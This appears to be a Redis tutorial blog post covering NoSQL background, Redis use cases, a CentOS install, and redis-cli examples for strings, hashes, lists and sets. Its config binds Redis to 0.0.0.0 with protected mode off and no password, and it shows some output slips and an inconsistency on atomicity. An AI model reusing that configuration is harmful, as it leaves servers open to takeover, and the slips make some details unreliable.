Introduction to Redis: deployment, principles, and usage

[Chapter 1]-NoSQL background knowledge review

What is NoSQL

  • NoSQL is most commonly explained as "non-relational"; many people also expand it as "Not Only SQL"
  • NoSQL is just a concept, generally referring to non-relational databases
  • Unlike relational databases, NoSQL stores generally do not guarantee the ACID properties
  • NoSQL is a revolutionary database movement that advocates non-relational data storage. Against the overwhelming dominance of relational databases, the concept is undoubtedly an injection of new thinking.

Features of NoSQL

Application scenarios

  • High-concurrency reads and writes
  • Reads and writes over massive data
  • High scalability
  • High speed

Unsuitable application scenarios

  • Scenarios that require transaction support
  • SQL-based structured storage, complex relational processing, and ad hoc query requirements

Common NoSQL databases

memcache

  • A NoSQL database that appeared very early
  • Data lives entirely in memory and is generally not persisted
  • Supports a simple key-value model
  • Generally used as a cache to assist a persistent database

redis

  • Covers most of Memcached's functionality
  • Data lives in memory; persistence is supported, mainly for backup and recovery
  • Besides the simple key-value model, it supports multiple data structures such as list, set, hash, and zset
  • Generally used as a cache to assist a persistent database
  • A widely used and popular in-memory database on the market today

mongoDB

  • High-performance, open-source, schema-free document database
  • Data is kept in memory; when memory is insufficient, less frequently used data is saved to disk
  • Although key-value in form, it provides rich query capabilities over values (especially JSON)
  • Supports binary data and large objects
  • Depending on the data's characteristics, it can replace an RDBMS as a standalone database, or work alongside an RDBMS to store specific kinds of data

HBase

  • Strongly consistent reads/writes
    • HBase is not an "eventually consistent" data store
    • It is well suited for tasks such as high-speed counter aggregation
  • Automatic sharding
    • HBase tables are distributed across the cluster as Regions; as data grows, Regions are automatically split and redistributed.
  • Automatic RegionServer failover
  • Hadoop/HDFS integration
    • HBase supports HDFS out of the box as its distributed file system
  • MapReduce
    • HBase supports massively parallel processing via MapReduce, using HBase as source and sink
  • Operation management
    • HBase provides built-in web pages for operational insight, as well as JMX metrics

[Chapter 2]-Introduction to Redis

Introduction to Redis

Redis Chinese official website

Redis Chinese official website: http://www.redis.cn/

On the official site you can quickly look up common commands, read the user manual, join community discussion, download installation packages, and more.

Redis basic knowledge

  • Redis is one of the most popular NoSQL systems today
  • It is an open-source key-value store written in ANSI C (unlike MySQL's two-dimensional table storage)
  • It is similar to Memcache but largely makes up for Memcache's shortcomings. Like Memcache, Redis caches data in memory; the difference is that Memcache can only keep data in memory and cannot automatically and periodically write it to disk, so after a power failure or restart the memory is cleared and the data is lost

Common business usage scenarios of Redis

Scenario 1: Get the latest N data

For example, to get the latest comments on a website article, keep the latest 5,000 comment IDs in a Redis list and fetch anything beyond that range from the database, as sketched below.
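
A minimal sketch of this pattern (the key name latest:comments and the comment IDs are illustrative): LPUSH prepends each new comment ID, LTRIM caps the list at 5,000 entries, and LRANGE reads a page.

127.0.0.1:6379> LPUSH latest:comments 1001
(integer) 1
127.0.0.1:6379> LPUSH latest:comments 1002
(integer) 2
# Keep only the newest 5000 IDs
127.0.0.1:6379> LTRIM latest:comments 0 4999
OK
# Read the first page (newest first)
127.0.0.1:6379> LRANGE latest:comments 0 9
1) "1002"
2) "1001"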

Scenario 2: Applied to various rankings to obtain TOP N operations

Unlike Scenario 1, where time serves as the weight, TOP N ranks by some other condition as the weight, such as the number of likes. Use a Redis sorted set: make the value to be ranked the sorted set's score and the concrete item the member; each update then needs only a single ZADD command.

The Redis ZADD command adds one or more members and their score values to a sorted set (a quick overview is enough here; see the sketch after this list)

  • If a member is already in the sorted set, its score is updated and the member is re-inserted to keep it in the correct position
  • Score values can be integers or double-precision floating-point numbers
  • If the sorted set key does not exist, an empty sorted set is created before the ZADD is performed
  • If the key exists but is not a sorted set, an error is returned
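
A minimal like-count ranking sketch (the key rank:likes and the members are illustrative): each like is one ZADD or ZINCRBY, and ZREVRANGE reads the TOP N.

127.0.0.1:6379> ZADD rank:likes 35 article:1 72 article:2
(integer) 2
# One more like for article:1
127.0.0.1:6379> ZINCRBY rank:likes 1 article:1
"36"
# TOP 3 by likes
127.0.0.1:6379> ZREVRANGE rank:likes 0 2 WITHSCORES
1) "article:2"
2) "72"
3) "article:1"
4) "36"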

Scenario 3: Applications that require precise expiration time settings

For example, set the sorted-set score from Scenario 2 to the expiration timestamp; you can then sort by expiration time and clear expired data periodically. Beyond clearing expired data inside Redis, you can also treat the expiration times in Redis as an index over database records: use Redis to find which data has expired, then precisely delete the corresponding records from the database. A sketch follows.
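
A sketch of this expiration-index idea, assuming the scores are Unix timestamps (the key expire:index, the members, and the timestamps are illustrative):

127.0.0.1:6379> ZADD expire:index 1663000000 order:1 1663003600 order:2
(integer) 2
# Everything expired as of "now" (now = 1663000000 here)
127.0.0.1:6379> ZRANGEBYSCORE expire:index 0 1663000000
1) "order:1"
# Delete the matching database records, then drop them from the index
127.0.0.1:6379> ZREM expire:index order:1
(integer) 1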

Scenario 4: Counter application

Redis commands are atomic, so the INCR and DECR commands make it easy to build a counter system.

Command:
incr key increments the value stored at key by 1 and returns the result;
decr key decrements the value stored at key by 1 and returns the result;

Scenario 5: Uniq operation to obtain all deduplicated values over a certain period of time

Redis's set data structure is ideal here: just keep adding data to a set, and because a set is a collection it deduplicates automatically, as sketched below.
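
For example, deduplicating visitor IPs for one day (the key uniq:ips:2022-09-12 is illustrative): duplicates are simply ignored, and SCARD returns the distinct count.

127.0.0.1:6379> SADD uniq:ips:2022-09-12 10.0.0.1 10.0.0.2 10.0.0.1
(integer) 2
127.0.0.1:6379> SCARD uniq:ips:2022-09-12
(integer) 2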

Scenario 6: Real-time system, anti-spam system

Using the set functionality from Scenario 5, the backend can check whether a given end user has performed a certain operation, and can pull the set of operations for analysis and statistical comparison, as sketched below.
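
For example, checking whether a user has already performed an operation (the key and members are illustrative): SISMEMBER answers the membership question in O(1).

127.0.0.1:6379> SADD actions:liked:post42 user1
(integer) 1
127.0.0.1:6379> SISMEMBER actions:liked:post42 user1
(integer) 1
127.0.0.1:6379> SISMEMBER actions:liked:post42 user2
(integer) 0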

Scenario 7: Caching

Data is stored directly in memory; performance is better than Memcached and the data structures are more varied. A typical pattern follows.
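
A typical cache pattern is to write the value together with a TTL so stale entries expire on their own (the key, TTL, and payload are illustrative):

127.0.0.1:6379> SETEX cache:user:1 300 "cached-value"
OK
127.0.0.1:6379> TTL cache:user:1
(integer) 297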

Features of Redis

  • Efficiency
    • Redis reads at roughly 110,000 operations/s and writes at roughly 81,000 operations/s
  • Atomicity
    • All Redis operations are atomic, and Redis also supports executing a group of operations atomically as a unit
  • Supports multiple data structures
    • string
    • list
    • hash
    • set
    • zset (sorted set)
  • Stability: persistence, master-slave replication (clustering)
  • Other features: expiration times, transactions, message subscription

A note on transaction support: Redis transactions are not full ACID transactions. Although Redis provides a transaction facility, it is not the same as a relational database transaction: Redis transactions guarantee only isolation and consistency; atomicity and durability are not guaranteed.

[Chapter 3]-Redis stand-alone environment installation

All of the various ways to install and deploy Redis are archived in "Redis Various Methods of Deployment": https://blog.csdn.net/wt334502157/article/details/123211953. If you only want installation and deployment, follow that article. This document is fairly large: it focuses on organizing and sharing overall Redis knowledge and introducing the development API, though it also covers installation and deployment.

Redis stand-alone environment linux installation and deployment

The official download address of the redis installation package

You can download any version at the official download address: http://download.redis.io/releases/

Install whichever version you need; the method and process are basically the same.

redis installation and deployment

[root@redis01 ~]# cat /etc/redhat-release 
CentOS Linux release 7.4.1708 (Core)
[root@redis01 ~]# mkdir -p /opt/software
[root@redis01 ~]# cd /opt/software
[root@redis01 software]# wget http://download.redis.io/releases/redis-3.2.8.tar.gz
[root@redis01 software]# tar -xf redis-3.2.8.tar.gz
[root@redis01 software]# ln -s redis-3.2.8 redis
[root@redis01 software]# ll
total 4
lrwxrwxrwx 1 root root   11 Sep 12 16:55 redis -> redis-3.2.8
drwxrwxr-x 6 root root 4096 Sep 12 16:52 redis-3.2.8
[root@redis01 software]# cd redis
[root@redis01 redis]# make && make install
...
...
[root@redis01 redis]# mkdir /data
[root@redis01 redis]# mkdir -p /opt/software/redis/logs/
[root@redis01 redis]# vim redis.conf 
# Commonly changed configuration items:
daemonize yes  # whether to run as a daemon
pidfile /opt/software/redis/redis_6379.pid   # location of the pid file
port 6379    # port number
dir "/root/redis/data"  # data directory
logfile "/opt/software/redis/logs/6379.log"  # log location and log file name
bind 0.0.0.0        # 0.0.0.0 allows remote access
protected-mode no  # protected mode

Start and shut down redis

# Start redis
[root@redis01 redis]# /opt/software/redis/src/redis-server /opt/software/redis/redis.conf 
[root@redis01 redis]# 
[root@redis01 redis]# netstat -tnlpu|grep 6379
tcp        0      0 0.0.0.0:6379            0.0.0.0:*               LISTEN      4475/redis-server 0 
[root@redis01 redis]# ps -ef | grep redis|grep -v grep 
root      4475     1  0 17:08 ?        00:00:00 /opt/software/redis/src/redis-server 0.0.0.0:6379
# Stop redis
[root@redis01 redis]# src/redis-cli -h 127.0.0.1 shutdown
[root@redis01 redis]# netstat -tnlpu|grep 6379
[root@redis01 redis]# ps -ef | grep redis|grep -v grep 
[root@redis01 redis]# 
# Redis is now stopped; start it again
[root@redis01 redis]# /opt/software/redis/src/redis-server /opt/software/redis/redis.conf

Connect redis

# -h specifies the Redis server IP address; localhost is used if omitted
[root@redis01 redis]# src/redis-cli -h 39.101.78.174
39.101.78.174:6379> 
# If redis replies PONG to the ping command, the connection is working
39.101.78.174:6379> ping
PONG

[Chapter 4]-Introduction to Redis data types

The five most commonly used data types in Redis

Type 1: String string operations

1. Set the value of the specified key

  • SET key value
39.101.78.174:6379> SET hello world
OK

2. Get the value of the specified key

  • GET key
39.101.78.174:6379> GET hello
"world"

3. Set the value of the given key to value and return the old value of the key

  • GETSET key value
39.101.78.174:6379> GETSET hello newworld
"world"
39.101.78.174:6379> GET hello
"newworld"

4. Get the values of all (one or more) given keys

  • MGET key1 key2 [key3…]
39.101.78.174:6379> SET k1 v1
OK
39.101.78.174:6379> SET k2 v2
OK
39.101.78.174:6379> SET k3 v3
OK
39.101.78.174:6379> MGET k1 k2 k3
1) "v1"
2) "v2"
3) "v3"
39.101.78.174:6379> 

5. Set the key to hold value and set the key's expiration time to seconds (in seconds)

  • SETEX key seconds value
39.101.78.174:6379> SETEX hello 10 world3
OK
39.101.78.174:6379> get hello
"world3"
# Query again after more than 10 seconds
39.101.78.174:6379> get hello
(nil)
39.101.78.174:6379> 

6. Only set the value of key when the key does not exist

  • SETNX key value
39.101.78.174:6379> GET k3
"v3"
39.101.78.174:6379> SETNX k3 v33
(integer) 0
# k3 already holds v3, so the set fails
39.101.78.174:6379> GET k3
"v3"
39.101.78.174:6379> SETNX k4 v4
(integer) 1
39.101.78.174:6379> GET k4
"v4"
39.101.78.174:6379> SETNX k4 v44
(integer) 0
39.101.78.174:6379> GET k4
"v4"
39.101.78.174:6379> 

7. Return the length of the string value stored in key

  • STRLEN key
39.101.78.174:6379> SET a a
OK
39.101.78.174:6379> SET bb bb
OK
39.101.78.174:6379> SET ccc ccc
OK
39.101.78.174:6379> SET dddd dddd
OK
39.101.78.174:6379> STRLEN a
(integer) 1
39.101.78.174:6379> STRLEN bb
(integer) 2
39.101.78.174:6379> STRLEN ccc
(integer) 3
39.101.78.174:6379> STRLEN dddd
(integer) 4
39.101.78.174:6379> STRLEN k1
(integer) 2
39.101.78.174:6379> STRLEN k2
(integer) 2

8. Set one or more key-value pairs at the same time

  • MSET key value [key value …]
39.101.78.174:6379> MSET k5 v5 k6 v6 k7 v7
OK
39.101.78.174:6379> GET k5
"v5"
39.101.78.174:6379> GET k6
"v6"
39.101.78.174:6379> GET k7
"v7"
39.101.78.174:6379> 

9. Set one or more key-value pairs at the same time, if and only if all given keys do not exist

  • MSETNX key value [key value …]
39.101.78.174:6379> MSETNX k7 v7 k8 v8 k9 v9 k10 v10
(integer) 0
# Among k7-k10, k7 already exists, so the whole set fails
39.101.78.174:6379> GET k8
(nil)
39.101.78.174:6379> MSETNX k8 v8 k9 v9 k10 v10
(integer) 1
39.101.78.174:6379> GET k8
"v8"
39.101.78.174:6379> 

10. PSETEX: like SETEX, but the key's time to live is given in milliseconds instead of seconds.

  • PSETEX key milliseconds value
39.101.78.174:6379> PSETEX k11 10000 v11
OK
39.101.78.174:6379> GET k11
"v11"
39.101.78.174:6379> GET k11
(nil)
39.101.78.174:6379> 

11. Increase the numerical value stored in key by one

  • INCR key
39.101.78.174:6379> SET tps 1
OK
39.101.78.174:6379> GET tps
"1"
39.101.78.174:6379> INCR tps
(integer) 2
39.101.78.174:6379> GET tps
"2"
39.101.78.174:6379> INCR tps
(integer) 3
39.101.78.174:6379> GET tps
"3"
39.101.78.174:6379> 

12. Add the given increment to the value stored in the key

  • INCRBY key increment
39.101.78.174:6379> GET tps
"3"
39.101.78.174:6379> INCRBY tps 10
(integer) 13
39.101.78.174:6379> GET tps
"13"
39.101.78.174:6379> INCRBY tps 2
(integer) 15
39.101.78.174:6379> GET tps
"15"
39.101.78.174:6379> 

13. Add the given floating-point increment to the value stored at key

  • INCRBYFLOAT key increment
39.101.78.174:6379> SET score 50
OK
39.101.78.174:6379> GET score
"50"
39.101.78.174:6379> INCRBYFLOAT score 0.5
"50.5"
39.101.78.174:6379> GET score
"50.5"
39.101.78.174:6379> INCRBYFLOAT score 7.5
"58"
39.101.78.174:6379> GET score
"58"
39.101.78.174:6379> INCRBYFLOAT score 1
"59"
39.101.78.174:6379> GET score
"59"
# compare with INCRBY
39.101.78.174:6379> INCRBY score 1
(integer) 60
39.101.78.174:6379> GET score
"60"
39.101.78.174:6379> INCRBY score 0.5
(error) ERR value is not an integer or out of range
39.101.78.174:6379> GET score
"60"
39.101.78.174:6379> 

14. Decrement the numerical value stored in key by one.

  • DECR key
39.101.78.174:6379> GET tps
"15"
39.101.78.174:6379> DECR tps
(integer) 14
39.101.78.174:6379> GET tps
"14"
39.101.78.174:6379> DECR tps
(integer) 13
39.101.78.174:6379> GET tps
"13"

15. Subtract the given decrement from the value stored at key

  • DECRBY key decrement
39.101.78.174:6379> GET tps
"13"
39.101.78.174:6379> DECRBY tps 3
(integer) 10
39.101.78.174:6379> GET tps
"10"
39.101.78.174:6379> DECRBY tps 2
(integer) 8
39.101.78.174:6379> GET tps
"8"
# negative values can be passed
39.101.78.174:6379> DECRBY tps -1
(integer) 9
39.101.78.174:6379> GET tps
"9"
# by contrast, DECR with an argument errors out
39.101.78.174:6379> DECR tps 2
(error) ERR wrong number of arguments for 'decr' command
39.101.78.174:6379> 

16. APPEND: if the key already exists and holds a string, APPEND appends the specified value to the end of the existing value.

  • APPEND key value
39.101.78.174:6379> SET wang t
OK
39.101.78.174:6379> GET wang
"t"
39.101.78.174:6379> APPEND wang i
(integer) 2
39.101.78.174:6379> GET wang
"ti"
39.101.78.174:6379> APPEND wang n
(integer) 3
39.101.78.174:6379> GET wang
"tin"
39.101.78.174:6379> APPEND wang g
(integer) 4
39.101.78.174:6379> GET wang
"ting"
39.101.78.174:6379> 
39.101.78.174:6379> APPEND wang _
(integer) 5
39.101.78.174:6379> GET wang
"ting_"
39.101.78.174:6379> APPEND wang 666
(integer) 8
39.101.78.174:6379> GET wang
"ting_666"
39.101.78.174:6379> 

Type 2: hash operations

Redis hash is a mapping table of string type fields and values. Hash is particularly suitable for storing objects.

Each hash in Redis can store 2^32 - 1 key-value pairs

1. Set the value of the field field in the hash table key to value

  • HSET key field value
39.101.78.174:6379> HSET key1 field1 value1
(integer) 1
39.101.78.174:6379> HGET key1 field1
"value1"
39.101.78.174:6379> 

2. Set the value of the hash table field only when the field field does not exist.

  • HSETNX key field value
127.0.0.1:6379> HGET key1 field1
"value1"
127.0.0.1:6379> HSETNX key1 field1 value2
(integer) 0
127.0.0.1:6379> HGET key1 field1
"value1"
127.0.0.1:6379> HSETNX key1 field2 value2
(integer) 1
127.0.0.1:6379> HGET key1 field2
"value2"
127.0.0.1:6379> 

3. Set multiple field-value pairs to the hash table key at the same time

  • HMSET key field1 value1 [field2 value2 …]
127.0.0.1:6379> HMSET key1 field3 value3 field4 value4 field5 value5
OK
127.0.0.1:6379> HGET key1 field3
"value3"
127.0.0.1:6379> HGET key1 field4
"value4"
127.0.0.1:6379> HGET key1 field5
"value5"
127.0.0.1:6379> 

4. Check whether the specified field exists in the hash table key

  • HEXISTS key field
127.0.0.1:6379> HEXISTS key1 field1
(integer) 1
127.0.0.1:6379> HEXISTS key1 field2
(integer) 1
127.0.0.1:6379> HEXISTS key1 field100
(integer) 0
127.0.0.1:6379> 

5. Get all fields and values of the specified key in the hash table

  • HGETALL key
127.0.0.1:6379> HGETALL key1
 1) "field1"
 2) "value1"
 3) "field2"
 4) "value2"
 5) "field3"
 6) "value3"
 7) "field4"
 8) "value4"
 9) "field5"
10) "value5"
127.0.0.1:6379> 

6. Get all fields in the hash table

  • HKEYS key
127.0.0.1:6379> HKEYS key1
1) "field1"
2) "field2"
3) "field3"
4) "field4"
5) "field5"
127.0.0.1:6379> 

7. Get the number of fields in the hash table

  • HLEN key
127.0.0.1:6379> HLEN key1
(integer) 5
127.0.0.1:6379> HSET key1 field6 value6
(integer) 1
127.0.0.1:6379> HLEN key1
(integer) 6
127.0.0.1:6379> 

8. Get the values of all given fields

  • HMGET key field1 field2 …
127.0.0.1:6379> HMGET key1 field1 field3 field5
1) "value1"
2) "value3"
3) "value5"
127.0.0.1:6379> 

9. Add increment to the integer value of the specified field in the hash table key

  • HINCRBY key field increment
127.0.0.1:6379> HSET key2 field1 100
(integer) 1
127.0.0.1:6379> HGET key2 field1
"100"
127.0.0.1:6379> HINCRBY key2 field1 2
(integer) 102
127.0.0.1:6379> HINCRBY key2 field1 2
(integer) 104
127.0.0.1:6379> HGET key2 field1
"104"
127.0.0.1:6379> 

10. Add increment to the floating point value of the specified field in the hash table key

  • HINCRBYFLOAT key field increment
127.0.0.1:6379> HGET key2 field1
"104"
127.0.0.1:6379> HINCRBYFLOAT key2 field1 0.01
"104.01"
127.0.0.1:6379> HGET key2 field1
"104.01"
127.0.0.1:6379> HINCRBYFLOAT key2 field1 10.1
"114.11"
127.0.0.1:6379> HGET key2 field1
"114.11"
127.0.0.1:6379> 

11. Get all values in the hash table

  • HVALS key
127.0.0.1:6379> HVALS key1
1) "value1"
2) "value2"
3) "value3"
4) "value4"
5) "value5"
6) "value6"
127.0.0.1:6379> HVALS key2
1) "114.11"
127.0.0.1:6379> 

12. Delete one or more hash table fields

  • HDEL key field1 field2 …
127.0.0.1:6379> HKEYS key1
1) "field1"
2) "field2"
3) "field3"
4) "field4"
5) "field5"
6) "field6"
127.0.0.1:6379> HDEL key1 field1 field3
(integer) 2
127.0.0.1:6379> HKEYS key1
1) "field2"
2) "field4"
3) "field5"
4) "field6"
127.0.0.1:6379> HVALS key1
1) "value2"
2) "value4"
3) "value5"
4) "value6"
127.0.0.1:6379> 

Type 3: list operations

A Redis list is a simple list of strings, sorted in insertion order. You can add an element to the head (left) or tail (right) of the list

A list can contain at most 2^32 - 1 elements (4,294,967,295, over 4 billion elements per list)

1. Insert one or more values into the head of the list

  • LPUSH key value1 value2 …
127.0.0.1:6379> LPUSH l1 v1 v2 v3
(integer) 3

2. View all data in the list

  • LRANGE key start stop
127.0.0.1:6379> LRANGE l1 0 100
1) "v3"
2) "v2"
3) "v1"
127.0.0.1:6379> LRANGE l1 0 1
1) "v3"
2) "v2"
127.0.0.1:6379> LRANGE l1 0 2
1) "v3"
2) "v2"
3) "v1"
127.0.0.1:6379> LRANGE l1 0 0
1) "v3"
127.0.0.1:6379> LRANGE l1 -10 2
1) "v3"
2) "v2"
3) "v1"
127.0.0.1:6379> 
# 0 -1 returns all elements
127.0.0.1:6379> LRANGE l1 0 -1
1) "v3"
2) "v2"
3) "v1"

3. Insert a value into the head of an existing list

  • LPUSH key value
127.0.0.1:6379> LRANGE l1 0 -1
1) "v3"
2) "v2"
3) "v1"
127.0.0.1:6379> LPUSH l1 V4
(integer) 4
127.0.0.1:6379> LRANGE l1 0 -1
1) "V4"
2) "v3"
3) "v2"
4) "v1"
127.0.0.1:6379> LINDEX l1 0
"V4"
127.0.0.1:6379> 

4. Add one or more values to the end of the list

  • RPUSH key value1 value2 …
127.0.0.1:6379> RPUSH l1 v5 v6 v7 v8
(integer) 8
127.0.0.1:6379> LRANGE l1 0 -1
1) "V4"
2) "v3"
3) "v2"
4) "v1"
5) "v5"
6) "v6"
7) "v7"
8) "v8"
127.0.0.1:6379> 

5. Add a single value to the end of an existing list

  • RPUSH key value
127.0.0.1:6379> RPUSH l1 v9
(integer) 9
127.0.0.1:6379> LRANGE l1 0 -1
1) "V4"
2) "v3"
3) "v2"
4) "v1"
5) "v5"
6) "v6"
7) "v7"
8) "v8"
9) "v9"
127.0.0.1:6379> 

6. Insert an element before or after a given element in the list

  • LINSERT key BEFORE|AFTER pivot value
127.0.0.1:6379> LINSERT l1 BEFORE v5 before_v5
(integer) 10
127.0.0.1:6379> LINSERT l1 AFTER v7 after_v7
(integer) 11
127.0.0.1:6379> LRANGE l1 0 -1
 1) "V4"
 2) "v3"
 3) "v2"
 4) "v1"
 5) "before_v5"
 6) "v5"
 7) "v6"
 8) "v7"
 9) "after_v7"
10) "v8"
11) "v9"
127.0.0.1:6379> 

7. Get elements in the list by index

  • LINDEX key index
127.0.0.1:6379> LINDEX l1 0
"V4"
127.0.0.1:6379> LINDEX l1 8
"after_v7"
127.0.0.1:6379> 

8. Set the value of a list element by index

  • LSET key index value
127.0.0.1:6379> LINDEX l1 5
"v5"
127.0.0.1:6379> LSET l1 5 v555
OK
127.0.0.1:6379> LINDEX l1 5
"v555"

9. Get the length of the list

  • LLEN key
127.0.0.1:6379> LLEN l1
(integer) 11

10. Remove and get the first element of the list

  • LPOP key
127.0.0.1:6379> LRANGE l1 0 -1
 1) "V4"
 2) "v3"
 3) "v2"
 4) "v1"
 5) "before_v5"
 6) "v5"
 7) "v6"
 8) "v7"
 9) "after_v7"
10) "v8"
11) "v9"
127.0.0.1:6379> LINDEX l1 0
"V4"
127.0.0.1:6379> LPOP l1
"V4"

11. Remove the last element of the list and the return value is the removed element

  • RPOP key
127.0.0.1:6379> LRANGE l1 0 -1
1) "v3"
2) "v2"
3) "v1"
4) "before_v5"
5) "v555"
6) "v6"
7) "v7"
8) "after_v7"
9) "v8"
10) "v9"
127.0.0.1:6379> RPOP l1
"V9"

12. Remove and return the first element of the list. If the list has no elements, the command blocks until an element can be popped or the wait times out.

  • BLPOP key1 [key2 ] timeout
127.0.0.1:6379> LRANGE l1 0 -1
1) "v3"
2) "v2"
3) "v1"
4) "before_v5"
5) "v555"
6) "v6"
7) "v7"
8) "after_v7"
9) "v8"
127.0.0.1:6379> BLPOP l1 2000
1) "l1"
2) "v3"
127.0.0.1:6379> LRANGE l1 0 -1
1) "v2"
2) "v1"
3) "before_v5"
4) "v555"
5) "v6"
6) "v7"
7) "after_v7"
8) "v8"

13. Remove and return the last element of the list. If the list has no elements, the command blocks until an element can be popped or the wait times out.

  • BRPOP key1 [key2 ] timeout
127.0.0.1:6379> BRPOP l1 2000
1) "l1"
2) "v8"

14. Remove the last element of the list and add that element to another list and return

  • RPOPLPUSH source destination
127.0.0.1:6379> LRANGE l1 0 -1
1) "v2"
2) "v1"
3) "before_v5"
4) "v555"
5) "v6"
6) "v7"
7) "after_v7"
127.0.0.1:6379> LRANGE l2 0 -1
(empty list or set)
127.0.0.1:6379> RPOPLPUSH l1 l2
"after_v7"
127.0.0.1:6379> LRANGE l1 0 -1
1) "v2"
2) "v1"
3) "before_v5"
4) "v555"
5) "v6"
6) "v7"
127.0.0.1:6379> LRANGE l2 0 -1
1) "after_v7"

15. Pop a value from the tail of one list, push it onto the head of another list, and return it; if the source list has no elements, the command blocks until an element can be popped or the wait times out.

  • BRPOPLPUSH source destination timeout
127.0.0.1:6379> BRPOPLPUSH l1 l2 2000
"v7"
127.0.0.1:6379> LRANGE l1 0 -1
1) "v2"
2) "v1"
3) "before_v5"
4) "v555"
5) "v6"
127.0.0.1:6379> LRANGE l2 0 -1
1) "v7"
2) "after_v7"

16. Trim a list so that only the elements within the specified range are kept; elements outside the range are deleted.

  • LTRIM key start stop
127.0.0.1:6379> LRANGE l1 0 -1
1) "v2"
2) "v1"
3) "before_v5"
4) "v555"
5) "v6"
127.0.0.1:6379> LTRIM l1 0 2
OK
127.0.0.1:6379> LRANGE l1 0 -1
1) "v2"
2) "v1"
3) "before_v5"

17. Delete the list of specified keys

  • DEL key
127.0.0.1:6379> DEL l2
(integer) 1
127.0.0.1:6379> LRANGE l2 0 -1
(empty list or set)

Type 4: set (unordered set) operations

  • A Redis set is an unordered collection of strings. Set members are unique: duplicate values cannot appear in a set
  • Sets in Redis are implemented with hash tables, so the complexity of adding, deleting, and lookup is O(1)
  • The maximum number of members in a set is 2^32 - 1

1. Add one or more members to the collection

  • SADD key member1 [member2 …]
127.0.0.1:6379> SADD set1 v1 v2
(integer) 2

2. Return all members in the collection

  • SMEMBERS key
127.0.0.1:6379> SMEMBERS set1
1) "v2"
2) "v1"

3. Get the number of members of the collection

  • SCARD key
127.0.0.1:6379> SCARD set1
(integer) 2
127.0.0.1:6379> SADD set1 v3
(integer) 1
127.0.0.1:6379> SCARD set1
(integer) 3

4. Return the difference between the first set and all subsequent sets

  • SDIFF key1 key2 …
127.0.0.1:6379> SADD set2 v1 v3 v4
(integer) 3
127.0.0.1:6379> SMEMBERS set1
1) "v2"
2) "v1"
3) "v3"
127.0.0.1:6379> SMEMBERS set2
1) "v4"
2) "v1"
3) "v3"
127.0.0.1:6379> SDIFF set1 set2
1) "v2"

5. Compute the difference of the given sets and store it in destination

  • SDIFFSTORE destination key1 key2 …
127.0.0.1:6379> SMEMBERS set1
1) "v2"
2) "v1"
3) "v3"
127.0.0.1:6379> SMEMBERS set2
1) "v4"
2) "v1"
3) "v3"
127.0.0.1:6379> SMEMBERS set3
(empty list or set)
127.0.0.1:6379> SDIFFSTORE set3 set1 set2
(integer) 1
127.0.0.1:6379> SMEMBERS set3
1) "v2"

6. Return the intersection of all given sets

  • SINTER key1 key2 …
127.0.0.1:6379> SMEMBERS set1
1) "v2"
2) "v1"
3) "v3"
127.0.0.1:6379> SMEMBERS set2
1) "v4"
2) "v1"
3) "v3"
127.0.0.1:6379> SINTER set1 set2
1) "v1"
2) "v3"

7. Return the intersection of all given sets and store it in destination

  • SINTERSTORE destination key1 key2 …
127.0.0.1:6379> SINTERSTORE set4 set1 set2
(integer) 2
127.0.0.1:6379> SMEMBERS set4
1) "v1"
2) "v3"

8. Determine whether the member element is a member of the set key

  • SISMEMBER key member
127.0.0.1:6379> SMEMBERS set1
1) "v2"
2) "v1"
3) "v3"
127.0.0.1:6379> SISMEMBER set1 v1
(integer) 1
127.0.0.1:6379> SISMEMBER set1 v4
(integer) 0

9. Move the member element from the source collection to the destination collection

  • SMOVE source destination member
127.0.0.1:6379> SMEMBERS set3
1) "v2"
127.0.0.1:6379> SMEMBERS set4
1) "v1"
2) "v3"
127.0.0.1:6379> SMOVE set3 set4 v2
(integer) 1
127.0.0.1:6379> SMEMBERS set4
1) "v2"
2) "v1"
3) "v3"

10. Remove and return a random element from the collection

  • SPOP key
127.0.0.1:6379> SMEMBERS set2
1) "v4"
2) "v1"
3) "v3"
127.0.0.1:6379> SPOP set2
"v4"
127.0.0.1:6379> SPOP set2
"v1"
127.0.0.1:6379> SMEMBERS set2
1) "v3"

11. Return one or more random members from the set

  • SRANDMEMBER key [count]
127.0.0.1:6379> SRANDMEMBER set1
"v3"
127.0.0.1:6379> SRANDMEMBER set1 2
1) "v1"
2) "v3"
127.0.0.1:6379> SRANDMEMBER set1 2
1) "v2"
2) "v1"

12. Remove one or more members from the collection

  • SREM key member1 [member2 …]
127.0.0.1:6379> SMEMBERS set1
1) "v2"
2) "v1"
3) "v3"
127.0.0.1:6379> SREM set1 v1 v2
(integer) 2
127.0.0.1:6379> SMEMBERS set1
1) "v3"

13. Return the union of all given sets

  • SUNION key1 [key2]
127.0.0.1:6379> SADD set1 v5 v6 v7
(integer) 3
127.0.0.1:6379> SMEMBERS set1
1) "v7"
2) "v5"
3) "v6"
4) "v3"
127.0.0.1:6379> SADD set2 v8 v9 
(integer) 2
127.0.0.1:6379> SMEMBERS set2
1) "v9"
2) "v8"
3) "v3"
127.0.0.1:6379> SUNION set1 set2
1) "v3"
2) "v5"
3) "v6"
4) "v9"
5) "v7"
6) "v8"

14. Store the union of all given sets in the destination set

  • SUNIONSTORE destination key1 [key2]
127.0.0.1:6379> SUNIONSTORE set5 set1 set2
(integer) 6
127.0.0.1:6379> SMEMBERS set5
1) "v3"
2) "v5"
3) "v6"
4) "v9"
5) "v7"
6) "v8"

Operations on keys

1. DEL: delete the key; this command removes the key if it exists

  • DEL key
127.0.0.1:6379> keys *
1) "L1"
2) "set1"
3) "set5"
4) "set4"
5) "set2"
6) "key2"
7) "key1"
8) "l1"
127.0.0.1:6379> DEL key1 key2
(integer) 2
127.0.0.1:6379> keys *
1) "L1"
2) "set1"
3) "set5"
4) "set4"
5) "set2"
6) "l1"

2. Serialize the given key and return the serialized value

  • DUMP key
127.0.0.1:6379> set k1 v1
OK
127.0.0.1:6379> DUMP k1
"\x00\x02v1\a\x00\xa0\xd7e\xad\xc3\x9a\xacA"

3. Check whether the given key exists

  • EXISTS key
127.0.0.1:6379> EXISTS k1
(integer) 1
127.0.0.1:6379> EXISTS k100
(integer) 0

4. Set the expiration time for the given key, in seconds

  • EXPIRE key seconds
127.0.0.1:6379> EXPIRE k1 8
(integer) 1
127.0.0.1:6379> EXISTS k1
(integer) 1
# Query after more than 8 seconds
127.0.0.1:6379> EXISTS k1
(integer) 0
127.0.0.1:6379> keys *
1) "L1"
2) "set1"
3) "set5"
4) "set4"
5) "set2"
6) "l1"

5. Set the expiration time of the key in milliseconds

  • PEXPIRE key milliseconds
127.0.0.1:6379> SET k2 v2
OK
127.0.0.1:6379> PEXPIRE k2 3000
(integer) 1
